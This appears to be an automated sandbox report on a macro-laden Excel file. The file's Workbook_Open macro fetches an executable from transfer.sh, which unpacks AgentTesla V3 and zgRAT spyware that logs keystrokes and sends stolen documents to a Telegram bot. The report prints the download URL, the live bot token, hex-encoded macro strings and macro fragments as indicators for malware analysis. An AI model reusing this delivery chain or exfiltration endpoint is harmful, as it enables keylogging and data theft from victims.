Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1978a1b83814Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da197b6d36fee5Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da197e38b4cb02Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198104356572Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1983cfbb680eHost: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19869b38ef92Host: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198966b6e37bHost: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198c3235a9deHost: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198efdb17ad0Host: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: global traffic

HTTP traffic detected: GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: transfer.sh

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://GCHNJv.com
Source: RegSvcs.exe, 00000003.00000002.1171424229.000000000251B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://Kcwgjt6COc07kGTRi1sQ.net
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.1171298576.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%appdata
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: dropped.exe, 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocumentdocument-----
Source: RegSvcs.exe, 00000003.00000002.1171520335.000000000259A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgP
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic

HTTP traffic detected: GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: transfer.sh

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown

HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defbHost: api.telegram.orgContent-Length: 1036Expect: 100-continueConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: 00001.LPCD2022.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API IServerXMLHTTPRequest2.Open("GET","https://transfer.sh/Uv5XFY/0000.LPCD2022.exe",False)	Name: cjpojbxatghyew
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Open()	Name: cjpojbxatghyew
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e???\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00^?\x00??\x00??\x03??d???\x00 \x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?*\x1e	Name: cjpojbxatghyew
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'ADODB.Stream' functions open, savetofile, write	Name: cjpojbxatghyew

.NET source code contains very large array initializations

Source: 3.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs	Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs	Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs	Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs	Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs	Large array initialization: .cctor: array initializer size 11655

Document contains an embedded VBA macro which may execute processes

Source: 00001.LPCD2022.xls	OLE, VBA macro line: Set zntkkzkmzqhln = jupwigkjmzusaimuh.SpawnInstance_
Source: VBA code instrumentation	OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, API SWbemObjectEx.SpawnInstance_()			Name: wdzlbznhf

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\dropped.exe

Jump to dropped file

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: 00001.LPCD2022.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send, setrequestheader			Name: cjpojbxatghyew

Document contains an embedded VBA macro with suspicious strings

Source: 00001.LPCD2022.xls	OLE, VBA macro line: xdgiejom = Environ("TEMP") & "\" & xdgiejom
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String environ: xdgiejom = Environ("TEMP") & "\" & xdgiejom			Name: cjpojbxatghyew

Document contains an embedded VBA with hexadecimal encoded strings

Source: 00001.LPCD2022.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: 00001.LPCD2022.xls	Stream path '_VBA_PROJECT_CUR/VBA/vzbprmttn' : found hex strings
Source: 00001.LPCD2022.xls	Stream path '_VBA_PROJECT_CUR/VBA/yhrgaijdj' : found hex strings
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d53584d4c322e5365727665
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, String 4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035
Source: VBA code instrumentation	OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c
Source: VBA code instrumentation	OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, String 77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_002D2428	2_2_002D2428
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_002D25C1	2_2_002D25C1
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_002D69C8	2_2_002D69C8
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_002D65A0	2_2_002D65A0
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_002D7B38	2_2_002D7B38
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_007F1347	2_2_007F1347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003ECA08	3_2_003ECA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E4320	3_2_003E4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E4668	3_2_003E4668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E4F38	3_2_003E4F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003EE778	3_2_003EE778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003ED780	3_2_003ED780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E1630	3_2_003E1630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_006248AA	3_2_006248AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00626928	3_2_00626928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00624DF0	3_2_00624DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0062CE70	3_2_0062CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0062A347	3_2_0062A347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0062C330	3_2_0062C330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00629E66	3_2_00629E66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0062CAF0	3_2_0062CAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0062A3C0	3_2_0062A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00620B88	3_2_00620B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_006E5818	3_2_006E5818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_006E2301	3_2_006E2301

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: 00001.LPCD2022.xls	OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open			Name: Workbook_Open

Source: 00001.LPCD2022.xls

OLE indicator, VBA macros: true

Source: dropped.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@6/4@26/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 00001.LPCD2022.xls

OLE indicator, Workbook stream: true

Source: 00001.LPCD2022.xls	Virustotal: Detection: 60%
Source: 00001.LPCD2022.xls	ReversingLabs: Detection: 60%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dropped.exe C:\Users\user\AppData\Local\Temp\dropped.exe
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe "C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

